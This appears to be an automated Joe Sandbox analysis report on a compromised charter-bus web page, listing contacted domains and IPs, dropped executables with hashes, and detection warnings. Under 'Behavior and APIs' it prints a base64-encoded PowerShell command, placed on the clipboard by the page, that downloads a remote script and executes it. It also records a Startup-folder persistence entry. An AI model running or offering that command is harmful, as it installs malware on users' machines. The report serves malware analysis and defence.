https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chromesuggestions	chrome.exe, 0000000E.00000002.2061764648.0000119001994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2096055959.0000146001994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2148449499.00004C5801994000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nonexistent.googlezip.net/	chrome.exe, 0000000E.00000003.2037264301.0000119001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2055268140.0000119001048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2053209181.0000146001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2088885306.00004C5801040000.00000004.00000800.00020000.00000000.sdmp	false		high
https://googleusercontent.comb	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bitly.cx	powershell.exe, 00000009.00000002.1749078220.00000000052A3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay	chrome.exe, 0000000E.00000002.2052865239.000011900060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2074491157.0000146000610000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2120252056.00004C5800610000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/yraPuhAK	Aceline.exe, 0000000D.00000002.2112993095.0000026B2D1B1000.00000004.00000001.00020000.00000000.sdmp	false		high
https://tunnel-staging.googlezip.net/2	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1750643154.000000000604C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Y1	chrome.exe, 00000011.00000003.2127746299.00004C58012A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_M1_CrossAppWebAra_1_Stable_20230926_A	chrome.exe, 0000000E.00000002.2057335305.00001190012FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2087486697.00001460012FC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://psee.io	powershell.exe, 00000009.00000002.1749078220.0000000005144000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Control_Consent_AllAPIs_Old_limited_Stable_20230807	chrome.exe, 0000000E.00000002.2057625057.00001190013A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2087814030.00001460013A4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/2	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nonexistent.googlezip.net/b	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/Z&	chrome.exe, 0000000E.00000002.2056322361.00001190011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2086387899.00001460011B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/	chrome.exe, 00000011.00000003.2128822420.00004C580130C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129065346.00004C5801314000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/	chrome.exe, 00000011.00000003.2128822420.00004C580130C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129065346.00004C5801314000.00000004.00000800.00020000.00000000.sdmp	false		high
https://psee.io/7m2yhx(:	powershell.exe, 00000009.00000002.1749078220.0000000005144000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/upload	chrome.exe, 00000011.00000002.2146004278.00004C5801508000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.privacysandbox.comb	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ	chrome.exe, 0000000E.00000003.2036829046.0000119000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2063201853.0000119001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2051384429.0000146000804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2100107185.0000146001C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chromesuggestionsEnabled	chrome.exe, 0000000E.00000002.2061764648.0000119001994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2096055959.0000146001994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2148449499.00004C5801994000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/LX	chrome.exe, 00000011.00000003.2129998035.00004C580134C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129557092.00004C5801344000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129153008.00004C5801324000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129447739.00004C5801334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129725325.00004C5801348000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2129065346.00004C5801314000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/coacEnableFullscreenAppListEnablePlayStoreAppSearchEnableFullscreenAppListEna	chrome.exe, 0000000E.00000002.2062483604.0000119001A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2098265781.0000146001A70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2148996080.00004C5801A70000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lens.google.com/v3/upload2	chrome.exe, 00000011.00000003.2086586337.00004C5800804000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/	chrome.exe, 0000000E.00000002.2056322361.00001190011B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.2057131461.0000119001278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2087274773.0000146001278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000002.2086387899.00001460011B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/?p=blocked	chrome.exe, 0000000E.00000002.2054231637.0000119000F18000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.43.51.48	unknown	United States	35994	AKAMAI-ASUS	false
75.2.108.141	epsilon.6sense.com	United States	16509	AMAZON-02US	false
34.239.236.43	psee.io	United States	14618	AMAZON-AESUS	false
23.43.51.47	e212585.b.akamaiedge.net	United States	35994	AKAMAI-ASUS	false
172.67.146.180	browngreencolors.top	United States	13335	CLOUDFLARENETUS	false
142.250.101.156	stats.g.doubleclick.net	United States	15169	GOOGLEUS	false
18.188.153.65	gogocharters.com	United States	16509	AMAZON-02US	false
70.40.216.191	ia-robotics.com	United States	46606	UNIFIEDLAYER-AS-1US	false
104.254.148.252	unknown	United States	29990	ASN-APPNEXUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
142.251.2.154	googleads.g.doubleclick.net	United States	15169	GOOGLEUS	false
142.250.101.105	www.google.com	United States	15169	GOOGLEUS	false
50.57.243.90	clients.contology.com	United States	32244	LIQUIDWEBUS	false
104.254.151.60	ib.anycast.adnxs.com	United States	29990	ASN-APPNEXUS	false
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.16.1	septembergoodwine.top	United States	13335	CLOUDFLARENETUS	false
142.250.101.103	unknown	United States	15169	GOOGLEUS	false
144.172.101.228	unknown	United States	53667	PONYNETUS	true
54.175.154.40	myvocabulary.com	United States	14618	AMAZON-AESUS	true
216.239.32.181	analytics-alv.google.com	United States	15169	GOOGLEUS	false
142.251.2.93	youtube-ui.l.google.com	United States	15169	GOOGLEUS	false
150.171.27.10	ax-0001.ax-msedge.net	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
74.125.137.104	unknown	United States	15169	GOOGLEUS	false
104.21.95.172	unknown	United States	13335	CLOUDFLARENETUS	false
99.83.231.3	unknown	United States	16509	AMAZON-02US	false
142.250.141.94	beacons-handoff.gcp.gvt2.com	United States	15169	GOOGLEUS	false
104.21.91.178	bitly.cx	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1696266
Start date and time:	2025-05-21 21:46:53 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://gogocharters.com/lexington-charter-bus
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.win@50/221@78/29
EGA Information:	Successful, ratio: 57.1%
HCA Information:	Successful, ratio: 69% Number of executed functions: 86 Number of non-executed functions: 3

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 142.250.101.113, 142.250.101.139, 142.250.101.138, 142.250.101.100, 142.250.101.101, 142.250.101.102, 74.125.137.84, 142.250.141.138, 142.250.141.100, 142.250.141.139, 142.250.141.102, 142.250.141.113, 142.250.141.101, 142.251.2.138, 142.251.2.102, 142.251.2.113, 142.251.2.101, 142.251.2.139, 142.251.2.100, 142.250.101.97, 74.125.137.94, 142.251.2.94, 23.66.134.242
Excluded domains from analysis (whitelisted): ev2-ring.msedge.net, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, www.googletagmanager.com, bat.bing.com, update.googleapis.com, clients.l.google.com, www.gstatic.com, c.pki.goog, www.google-analytics.com
Execution Graph export aborted for target Aceline.exe, PID 4216 because there are no executed function
Execution Graph export aborted for target chrome.exe, PID 7448 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7348 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://gogocharters.com/lexington-charter-bus

Simulations

Behavior and APIs

Time	Type	Description
15:48:19	API Interceptor	44x Sleep call for process: powershell.exe modified
15:48:40	API Interceptor	489x Sleep call for process: Aceline.exe modified
21:48:18	Clipboard	Run: powershell /ep bypass /e JABiAD0AKABOAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABzACcAKwAnAGUAZQAuAGkAbwAvADcAbQAnACsAJwAyAHkAaAB4ACcAKQA7AGkAZQBYACAAJABiADsA /W 1
21:48:44	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Aceline.url

Process:	C:\Users\user\AppData\Local\Temp\Aceline.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5946776
Entropy (8bit):	6.838482833956945
Encrypted:	false
SSDEEP:	98304:Kii0LgHXMBBBBB2UWUznpXqQCvZ4AIKrw68OUAJUdrQOs8OWN3zBkTVjgkb/kOUV:ziSg3MBBBBB2UWUznpXqlvZ4AIKrw68V
MD5:	FFD09F92A5477A88E376970A0348DDD6
SHA1:	2AC9EDCA1B6505EEA8686D0206BF37A266D9BF65
SHA-256:	82767F8B2546A8C234EF212203452A24962EDEE5E8CCB936179499288340D016
SHA-512:	29E979A4CB73A8AD5FE881019AC5A40BC045CA5ED69F3EDBD0EA68603050615C617AC0C8E1E2CA3A2223FF091D0FE5B0A1994BC1E44587F1EB57CA9C306652E3
Malicious:	true
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.L..."..."..."......"..#..."..#!..."..#&..."..#'.0."..##..."...&..."...$..."...#..."...#.\|."..#+..."..#"..."..#..."......."..# ...".Rich..".................PE..d....V.g.........."....*.`/..2.................@..............................Z.....Y\Z...`..........................................kC.....tlC......PG.......E.d<...lZ..Q...0H.......;.......................;.(...p.;.@............p/.H............................text....^/......`/................. ..`.rdata...6...p/..8...d/.............@..@.data... T....C..D....C.............@....pdata..d<....E..>....D.............@..@.rsrc........PG.......G.............@..@.reloc...T...0H..T....G.............@..B................................................................................................................................................................................................................

Process:	C:\Users\user\AppData\Local\Aceline.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.383282394444275
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp151KDLI4MN5I/k1Bv:ML9E4KQ71qE4GIsD
MD5:	00930768B2E044245AC5529BC4F2FFDF
SHA1:	DF262F47F31653AAE570477B12B90B2E385A8D50
SHA-256:	E0A23AC0FD66AC2AD5922D20187B374A1B7B148FF47CABB69441EB2F699008C8
SHA-512:	76F371B3D2FCE707DA45DCA1755DE56BA7AC8827E5F18F900E52AEF35AEF3D42B39F656CC08A10372872BA601AFD9E6F3D930A98F92A3F9A885E9B6CBAF38ADA
Malicious:	false
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1704
Entropy (8bit):	5.465152489498165
Encrypted:	false
SSDEEP:	48:z1WSU4YymI4RIoUeW+mZ9tK8NWR8PSNRrsR908dym:z1LHYvIIfLmZ2KWEUIS8Em
MD5:	26A84DC381361FB9B7AE0658910A101F
SHA1:	D5FCD9A8F2765D6C24A5DF92C1C61628E95B2763
SHA-256:	86B26574F698305C86B179DE511C7BA20B6F65A18A12E0A959A00B77FAA8E476
SHA-512:	D1890D0BE2757E4580D7B02DDEB653FCEAB12A5D6CFA7D9E256864F0EC724E21B5598144C8D3D4FA6284CBB81B3333A45BB7EDFB95C76CF3739CC3AB338CA233
Malicious:	false
Reputation:	low
Preview:	@...e...........B.....................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 48836, version 1.0
Category:	downloaded
Size (bytes):	48836
Entropy (8bit):	7.996186499450183
Encrypted:	true
SSDEEP:	768:grGFVEQHLxxs0tiloCIajnhCUlzFeIN9NtEhLSwdZt+HZmiXH+ZbmFDsTswTMcHf:gQhjs0tim5axTC4M8giXHcbmF6DMcSQ5
MD5:	F3D89F2E11F1870A0C6F1CD7C1DA647A
SHA1:	4012D9E05C30F9B1524C8A614BF6864B6B819DF5
SHA-256:	ED92B61060D50EF6D9F2650FF187679814C0DBB5DF13CA789F6EB7FABADD9EFB
SHA-512:	149837660AB4E12F03DEDA0BE75B39ED5CD72DE27F31D4943C9997C13847BCFC4059F48829CFC14AB64A74277FD580FCCD26239600CAE576F180A677B1E2534C
Malicious:	false
Reputation:	low
URL:	https://gogocharters.com/fonts_new_design/Poppins/Poppins-Bold.woff2
Preview:	wOF2..............9....b........................?FFTM........Z.`..^.....H..<.....6.$..f. ..W..8[>...G.., ..P...>...U.2...9.G....5(U1X".>.w+..r........I.2.....&..pb..V......(9.e.s...'Us89K...UH..=..a.'..'...t<.tq..s>.Z...Bx......j=:...1#...r.-..?..\|<_Sa......HP%......W..u5R....S....s..o.88...A.D..88...7.7Zm..I..zg.\z.........G....[.5^.Z;i.WH..]B.....m.....V.`.C>.....M..[E.\|H.-.G.......QE.v.!08..C.~.H+.......{E..>7)Lu......`=.2.O._.R...FL^\....I.&5..(P........cc..)..c...4..w....$..DZ.d;.G.p.%J$RB)k..Jt..\|.m....K'...F....o(.{...}?.r.7.P..h.`,.M[.)w.t......Ks.cU...\#..... S@....Qq.O..Y..fSQ.K.^.uW....f.R........8..Yj..GH...............-...../r~z..@...j.......f..0.a.B.]....7..RJ)np.S4E.4ES4....(.E.h......[.EQ.E..0q.O$.7..k....K(...%.J[Zg..8..<..=}m.5..."......v.......?&.J.Dl...'j'....Ml>.".9....{./.....W..&g..6..eb.r&.L..Nz..l..."...n^)..R...(..i.....-..h..i...._..RJi.....1.....RJ)....EQ.E.4M.np..EQ.M.4M...9.%.9...i......._....*y..R4.~.v....O[....B.6..

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://gogocharters.com/lexington-charter-bus

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

AI Reasoning

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

HTML

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Aceline.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Aceline.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Aceline.exe

C:\Users\user\AppData\Local\Temp\VWSECTGEBPBA.zip

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5x22ncaj.brh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tao1ooin.vmo.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnept4w3.r24.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfm2vfh5.bva.ps1

Windows Analysis Report
http://gogocharters.com/lexington-charter-bus